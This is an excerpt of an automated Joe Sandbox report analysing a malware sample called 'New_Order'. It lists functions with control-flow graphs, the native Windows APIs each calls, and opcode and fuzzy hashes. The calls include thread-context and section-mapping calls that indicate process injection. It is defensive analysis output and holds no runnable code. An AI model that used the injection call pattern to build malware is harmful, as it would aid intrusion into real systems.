                                                                                                control_flow_graph 132 40abe3-40ac47 call 4097e3 call 4097f3 139 40ad25-40ad5e NtCreateFile 132->139 140 40ac4d-40ac92 call 409883 call 42b5c2 call 409753 call 42b5c2 132->140 141 40ad64-40ad6b 139->141 142 40adfb-40ae07 139->142 162 40ac9d-40aca3 140->162 144 40ad76-40ad7c 141->144 146 40ada4-40ada8 144->146 147 40ad7e-40ada2 144->147 150 40adea-40adf8 call 409883 146->150 151 40adaa-40adb1 146->151 147->144 150->142 153 40adbc-40adc2 151->153 153->150 156 40adc4-40ade8 153->156 156->153 163 40aca5-40acc9 162->163 164 40accb-40accf 162->164 163->162 164->139 166 40acd1-40acec 164->166 167 40acf7-40acfd 166->167 167->139 168 40acff-40ad23 167->168 168->167
                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AD51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 793c52acca32888782230ea386f9b1bf22d0d08d68452e88c64ed9fffda0f097
                                                                                                • Instruction ID: 091f9aba490193ab6a2475a467b29eaf89d4953ca7f51bc4f660e159ba167cff
                                                                                                • Opcode Fuzzy Hash: 793c52acca32888782230ea386f9b1bf22d0d08d68452e88c64ed9fffda0f097
                                                                                                • Instruction Fuzzy Hash: AB815071E04258DFCB04CFA9D890AEDBBF2AF4D304F18816AE859B7341D638A952CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A9B3 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 170 40a9b3-40a9d2 171 40a9d8-40aa17 call 4097f3 170->171 172 40a9d3 call 4097e3 170->172 175 40aaf5-40ab2a NtMapViewOfSection 171->175 176 40aa1d-40aa62 call 409883 call 42b5c2 call 409753 call 42b5c2 171->176 172->171 177 40ab30-40ab37 175->177 178 40abc7-40abd3 175->178 198 40aa6d-40aa73 176->198 180 40ab42-40ab48 177->180 183 40ab70-40ab74 180->183 184 40ab4a-40ab6e 180->184 185 40abb6-40abc4 call 409883 183->185 186 40ab76-40ab7d 183->186 184->180 185->178 189 40ab88-40ab8e 186->189 189->185 192 40ab90-40abb4 189->192 192->189 199 40aa75-40aa99 198->199 200 40aa9b-40aa9f 198->200 199->198 200->175 201 40aaa1-40aabc 200->201 203 40aac7-40aacd 201->203 203->175 204 40aacf-40aaf3 203->204 204->203
                                                                                                APIs
                                                                                                • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AB1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SectionView
                                                                                                • String ID:
                                                                                                • API String ID: 1323581903-0
                                                                                                • Opcode ID: 631a755a64c89425d0b3586af4fa167366fc119e91a7080f9912608b4dae697c
                                                                                                • Instruction ID: 7cc8cfd1bd2a197ac9027ff94133cc42be4aa7b859208a575efc02660d628369
                                                                                                • Opcode Fuzzy Hash: 631a755a64c89425d0b3586af4fa167366fc119e91a7080f9912608b4dae697c
                                                                                                • Instruction Fuzzy Hash: A9716E71E04248DFCB04CFA9C590AEDBBF2AF4D304F18816AE959B7381D634A951CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040AE13 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 206 40ae13-40ae77 call 4097e3 call 4097f3 211 40af55-40af86 NtReadFile 206->211 212 40ae7d-40aec2 call 409883 call 42b5c2 call 409753 call 42b5c2 206->212 213 40b023-40b02f 211->213 214 40af8c-40af93 211->214 234 40aecd-40aed3 212->234 216 40af9e-40afa4 214->216 218 40afa6-40afca 216->218 219 40afcc-40afd0 216->219 218->216 222 40b012-40b020 call 409883 219->222 223 40afd2-40afd9 219->223 222->213 225 40afe4-40afea 223->225 225->222 230 40afec-40b010 225->230 230->225 235 40aed5-40aef9 234->235 236 40aefb-40aeff 234->236 235->234 236->211 237 40af01-40af1c 236->237 239 40af27-40af2d 237->239 239->211 240 40af2f-40af53 239->240 240->239
                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF79
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 4eb24fdefc21fc2c93831676e29b30598259ad2d8d13babe90a8c7c2d71f1a34
                                                                                                • Instruction ID: 8cb9eca6d8d740cd0487a02ec69d0680f136d89ceb50725fa4e56081d25e04e6
                                                                                                • Opcode Fuzzy Hash: 4eb24fdefc21fc2c93831676e29b30598259ad2d8d13babe90a8c7c2d71f1a34
                                                                                                • Instruction Fuzzy Hash: 15714DB1E04258DFCB05CFA9C490AEDBBF1AF4D304F18806AE859B7381D638A952DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040B6A3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 242 40b6a3-40b6c2 243 40b6c8-40b707 call 4097f3 242->243 244 40b6c3 call 4097e3 242->244 247 40b7e5-40b80a NtAllocateVirtualMemory 243->247 248 40b70d-40b752 call 409883 call 42b5c2 call 409753 call 42b5c2 243->248 244->243 249 40b810-40b817 247->249 250 40b8a7-40b8b3 247->250 270 40b75d-40b763 248->270 252 40b822-40b828 249->252 254 40b850-40b854 252->254 255 40b82a-40b84e 252->255 257 40b896-40b8a4 call 409883 254->257 258 40b856-40b85d 254->258 255->252 257->250 262 40b868-40b86e 258->262 262->257 265 40b870-40b894 262->265 265->262 271 40b765-40b789 270->271 272 40b78b-40b78f 270->272 271->270 272->247 273 40b791-40b7ac 272->273 275 40b7b7-40b7bd 273->275 275->247 276 40b7bf-40b7e3 275->276 276->275
                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B7FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                • Opcode ID: 52e084ed55a10b43a3079ca26270e86ce4c14479d12fd78bf7730d94c47354ab
                                                                                                • Instruction ID: 3f73a8b70b62c302fc412cebd520680a007c0504d8b9a13687b6318b0e8755a4
                                                                                                • Opcode Fuzzy Hash: 52e084ed55a10b43a3079ca26270e86ce4c14479d12fd78bf7730d94c47354ab
                                                                                                • Instruction Fuzzy Hash: 34711C75E04158DBCB04CFA9C490AEDBBF5AF89304F18806AE859B7351D738A946CF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A163 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 351 40a163-40a1c7 call 4097e3 call 4097f3 356 40a2a5-40a2ba NtSetContextThread 351->356 357 40a1cd-40a212 call 409883 call 42b5c2 call 409753 call 42b5c2 351->357 359 40a2c0-40a2c7 356->359 360 40a357-40a363 356->360 379 40a21d-40a223 357->379 361 40a2d2-40a2d8 359->361 363 40a300-40a304 361->363 364 40a2da-40a2fe 361->364 367 40a346-40a354 call 409883 363->367 368 40a306-40a30d 363->368 364->361 367->360 370 40a318-40a31e 368->370 370->367 373 40a320-40a344 370->373 373->370 380 40a225-40a249 379->380 381 40a24b-40a24f 379->381 380->379 381->356 383 40a251-40a26c 381->383 384 40a277-40a27d 383->384 384->356 385 40a27f-40a2a3 384->385 385->384
                                                                                                APIs
                                                                                                • NtSetContextThread.NTDLL(?,?), ref: 0040A2AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ContextThread
                                                                                                • String ID:
                                                                                                • API String ID: 1591575202-0
                                                                                                • Opcode ID: 87136a012c31217d14ee93e5743bac967b4bed498a1c5583049144a1f16faaa1
                                                                                                • Instruction ID: 023d3cbe1e85adcce1d5e41d574bb1a9c465bf608222c0862e071c7e75648c27
                                                                                                • Opcode Fuzzy Hash: 87136a012c31217d14ee93e5743bac967b4bed498a1c5583049144a1f16faaa1
                                                                                                • Instruction Fuzzy Hash: E8714EB1E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE855B7381D639A952DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040B283 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 387 40b283-40b2a2 388 40b2a8-40b2e7 call 4097f3 387->388 389 40b2a3 call 4097e3 387->389 392 40b3c5-40b3db NtDelayExecution 388->392 393 40b2ed-40b332 call 409883 call 42b5c2 call 409753 call 42b5c2 388->393 389->388 394 40b3e1-40b3e8 392->394 395 40b478-40b484 392->395 415 40b33d-40b343 393->415 397 40b3f3-40b3f9 394->397 399 40b421-40b425 397->399 400 40b3fb-40b41f 397->400 403 40b467-40b475 call 409883 399->403 404 40b427-40b42e 399->404 400->397 403->395 406 40b439-40b43f 404->406 406->403 409 40b441-40b465 406->409 409->406 416 40b345-40b369 415->416 417 40b36b-40b36f 415->417 416->415 417->392 419 40b371-40b38c 417->419 420 40b397-40b39d 419->420 420->392 421 40b39f-40b3c3 420->421 421->420
                                                                                                APIs
                                                                                                • NtDelayExecution.NTDLL(0041A421,?,?,?,00000000), ref: 0040B3CE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DelayExecution
                                                                                                • String ID:
                                                                                                • API String ID: 1249177460-0
                                                                                                • Opcode ID: ba2f661eb69a4508f0dbbb60ba6f484c5390c2c03774a4feecc673b1fd2a2450
                                                                                                • Instruction ID: 791f9ef6533e99e9f493a0185bef1f8106d41313da9967f44660d7868f2a12b5
                                                                                                • Opcode Fuzzy Hash: ba2f661eb69a4508f0dbbb60ba6f484c5390c2c03774a4feecc673b1fd2a2450
                                                                                                • Instruction Fuzzy Hash: 6B714071E14158DFCB05CFA9C490AEDBBF1AF49304F18806AE855B7381D738AA46DF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409D43 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 278 409d43-409d62 279 409d68-409da7 call 4097f3 278->279 280 409d63 call 4097e3 278->280 283 409e85-409e9a NtSuspendThread 279->283 284 409dad-409df2 call 409883 call 42b5c2 call 409753 call 42b5c2 279->284 280->279 285 409ea0-409ea7 283->285 286 409f37-409f43 283->286 307 409dfd-409e03 284->307 288 409eb2-409eb8 285->288 290 409ee0-409ee4 288->290 291 409eba-409ede 288->291 294 409f26-409f34 call 409883 290->294 295 409ee6-409eed 290->295 291->288 294->286 298 409ef8-409efe 295->298 298->294 301 409f00-409f24 298->301 301->298 308 409e05-409e29 307->308 309 409e2b-409e2f 307->309 308->307 309->283 311 409e31-409e4c 309->311 312 409e57-409e5d 311->312 312->283 313 409e5f-409e83 312->313 313->312
                                                                                                APIs
                                                                                                • NtSuspendThread.NTDLL(?,?), ref: 00409E8D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SuspendThread
                                                                                                • String ID:
                                                                                                • API String ID: 3178671153-0
                                                                                                • Opcode ID: b70fb1ee1063a57eed4932dba28c79c325ea099cbab4d51b5908aec126b9c6e7
                                                                                                • Instruction ID: 9ece9740807b263bdb9cac89a3a5973c529daffa53d302aa6e4a34757cb8d74e
                                                                                                • Opcode Fuzzy Hash: b70fb1ee1063a57eed4932dba28c79c325ea099cbab4d51b5908aec126b9c6e7
                                                                                                • Instruction Fuzzy Hash: 71713071E04158DFCB05CFA9D490AEDBBF1AF49304F1880AAE859B7382D638AD41DF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409F53 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 315 409f53-409f72 316 409f78-409fb7 call 4097f3 315->316 317 409f73 call 4097e3 315->317 320 40a095-40a0aa NtGetContextThread 316->320 321 409fbd-40a002 call 409883 call 42b5c2 call 409753 call 42b5c2 316->321 317->316 322 40a0b0-40a0b7 320->322 323 40a147-40a153 320->323 343 40a00d-40a013 321->343 325 40a0c2-40a0c8 322->325 327 40a0f0-40a0f4 325->327 328 40a0ca-40a0ee 325->328 330 40a136-40a144 call 409883 327->330 331 40a0f6-40a0fd 327->331 328->325 330->323 335 40a108-40a10e 331->335 336 40a0ff-40a105 331->336 335->330 339 40a10f-40a134 335->339 336->335 339->336 344 40a015-40a039 343->344 345 40a03b-40a03f 343->345 344->343 345->320 347 40a041-40a05c 345->347 348 40a067-40a06d 347->348 348->320 349 40a06f-40a093 348->349 349->348
                                                                                                APIs
                                                                                                • NtGetContextThread.NTDLL(?,?), ref: 0040A09D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ContextThread
                                                                                                • String ID:
                                                                                                • API String ID: 1591575202-0
                                                                                                • Opcode ID: 5d76aa609bfeac2484f0bb8c5bd911d5daa081eb4e765a6b370f40721b3436c8
                                                                                                • Instruction ID: 116779ae447167fb4550ca9d0ba5669621012b9fcb79067995f05f1f88e9909b
                                                                                                • Opcode Fuzzy Hash: 5d76aa609bfeac2484f0bb8c5bd911d5daa081eb4e765a6b370f40721b3436c8
                                                                                                • Instruction Fuzzy Hash: AC718F71E0425CDFCB05CFA9C890AEDBBF1AF49304F18806AE455B7381D639A952CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004171A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 423 4171a3-4171cc call 42acc3 426 4171d2-4171e0 call 42b1e3 423->426 427 4171ce-4171d1 423->427 430 4171f0-417201 call 429683 426->430 431 4171e2-4171ed call 42b463 426->431 436 417203-417217 LdrLoadDll 430->436 437 41721a-41721d 430->437 431->430 436->437
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417215
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: 3b2cb7e8bf59e028e2f23eb5500f8a6a2a15dc7debedde3c7336cc6782d4918d
                                                                                                • Instruction ID: 3d710fc2f89f025c77ec1252eae56d2001ad429842cfa088273671c757db02f3
                                                                                                • Opcode Fuzzy Hash: 3b2cb7e8bf59e028e2f23eb5500f8a6a2a15dc7debedde3c7336cc6782d4918d
                                                                                                • Instruction Fuzzy Hash: 87015EB1E0020DBBDB10DAE5DC42FDEB3B8AB54308F00819AE90897240F634EB588B95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004281B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtClose.NTDLL(0041A3C8,?,?,00000000,?,0041A3C8,?,?,?,?,?,?,?,?,00000000,?), ref: 004281EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 6f397526c4f439ef1f971a255c4d659dd4ee89204f6e3957335775ee249e666d
                                                                                                • Instruction ID: 85cbda53331432bfd53cf02f3bb48c45da60cf8ab712812db3808f901ceeb53e
                                                                                                • Opcode Fuzzy Hash: 6f397526c4f439ef1f971a255c4d659dd4ee89204f6e3957335775ee249e666d
                                                                                                • Instruction Fuzzy Hash: 5FE04F762412147BD620AA5ADC01FA7775CDBC5764F008429FA0867242CA7179118BE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 3729053202cf5c470d14323acb051b3812fcc802a8e45ac9ed374e170a6b2966
                                                                                                • Instruction ID: ba2b3e3d07f0e537bc42208ab0ec885733a314403c726fef6f9571fc42dec967
                                                                                                • Opcode Fuzzy Hash: 3729053202cf5c470d14323acb051b3812fcc802a8e45ac9ed374e170a6b2966
                                                                                                • Instruction Fuzzy Hash: 1490026521241003410571588414616401A97E0201B55C021E2014590DC52589916226
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b47d35f47e3a454307e92ceb7822faa155d49c6e6a3168130ef48141ca8519b1
                                                                                                • Instruction ID: 5b2bc83ec17d154037d01b022927203b9924f526e9b3beef676353a332bb2cd7
                                                                                                • Opcode Fuzzy Hash: b47d35f47e3a454307e92ceb7822faa155d49c6e6a3168130ef48141ca8519b1
                                                                                                • Instruction Fuzzy Hash: 3D90023521141413D11171588504707001997D0241F95C412E1424558DD6568A52A222
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 3367622afb5aa42eeddc5eaa0b118e38005479d27281ebe5257bcfee27ecc5ab
                                                                                                • Instruction ID: e5ae273c32a75e913974ca1ed8424875c29eba1a5fd1aaac4242d09e6ecdfbf0
                                                                                                • Opcode Fuzzy Hash: 3367622afb5aa42eeddc5eaa0b118e38005479d27281ebe5257bcfee27ecc5ab
                                                                                                • Instruction Fuzzy Hash: 4D90023521149802D1107158C40474A001597D0301F59C411E5424658DC69589917222
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b6e6d01346f43c870eda17789cdfa98c907e17c694342d43f3d66619801c3399
                                                                                                • Instruction ID: 7390711b97c14e52b0a6e194bd9fe5820802155b1c3a93308213e3b0fb1d6363
                                                                                                • Opcode Fuzzy Hash: b6e6d01346f43c870eda17789cdfa98c907e17c694342d43f3d66619801c3399
                                                                                                • Instruction Fuzzy Hash: 9F90023561551402D10071588514706101597D0201F65C411E1424568DC7958A5166A3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041394C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(1f29T718,00000111,00000000,00000000), ref: 00413A3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 1f29T718$1f29T718
                                                                                                • API String ID: 1836367815-1459837916
                                                                                                • Opcode ID: fd5051aba5d8254e2e6eeee8ac0a2d55f9ef6c1ef097dbc3d11d51cdf8086339
                                                                                                • Instruction ID: e42982fa7dc1b8f60389fb1eede9d680502c9fcb573a9973c92ff95836ecea1e
                                                                                                • Opcode Fuzzy Hash: fd5051aba5d8254e2e6eeee8ac0a2d55f9ef6c1ef097dbc3d11d51cdf8086339
                                                                                                • Instruction Fuzzy Hash: 2D21ACB1904148BAD711EFA0CCC1CEEBF7CDF42799B14006EF404EB242C2288E0387A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004139BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(1f29T718,00000111,00000000,00000000), ref: 00413A3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 1f29T718$1f29T718
                                                                                                • API String ID: 1836367815-1459837916
                                                                                                • Opcode ID: 0bbe11705a04bae41bf6afc24da8f4c453fa72a1fccf50242a3595f60db23571
                                                                                                • Instruction ID: 16b24b6f2770e8dcc1d0b8086f44197316ad6dda0b280e4b55e3fb119363becf
                                                                                                • Opcode Fuzzy Hash: 0bbe11705a04bae41bf6afc24da8f4c453fa72a1fccf50242a3595f60db23571
                                                                                                • Instruction Fuzzy Hash: 7D1102B2D4021C7EDB00AAA5CC81DEFBB7C9F40698F448069F914B7241D6785E0647A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004139C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(1f29T718,00000111,00000000,00000000), ref: 00413A3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 1f29T718$1f29T718
                                                                                                • API String ID: 1836367815-1459837916
                                                                                                • Opcode ID: 042ec037c0b9aef3c8efbc57bff4c6328a8cc598c954f9427f59803a1b50e90d
                                                                                                • Instruction ID: b417366645355986f9d3199ea8b3e22c39c9d537400e9ebf641e9f844f4e469c
                                                                                                • Opcode Fuzzy Hash: 042ec037c0b9aef3c8efbc57bff4c6328a8cc598c954f9427f59803a1b50e90d
                                                                                                • Instruction Fuzzy Hash: 5E01E1B1D0011CBEDB00AAA18C81DEFBB7C9F41798F048069FA18B7241D6784E0687B6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00428473 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(004197AD,?,?,004197AD,?,?,?,004197AD,?,00002000), ref: 004284AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 6575475864637a8836c70dfc7b389d21ea2546d3a119104b45b0ab53ae8fac6c
                                                                                                • Instruction ID: ba56610dc95118f2a6a16a0ffb092aabe53efdfddef07a73798d83fcdc4a40a5
                                                                                                • Opcode Fuzzy Hash: 6575475864637a8836c70dfc7b389d21ea2546d3a119104b45b0ab53ae8fac6c
                                                                                                • Instruction Fuzzy Hash: 57E06DB26042047BE614EE59EC41FAB33ADDFC4710F004419FA08A7242D671B9218AB8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004284C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(0041207F,?,0041207F,?,00000000,0041207F,?,0041207F,?,?), ref: 00428502
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
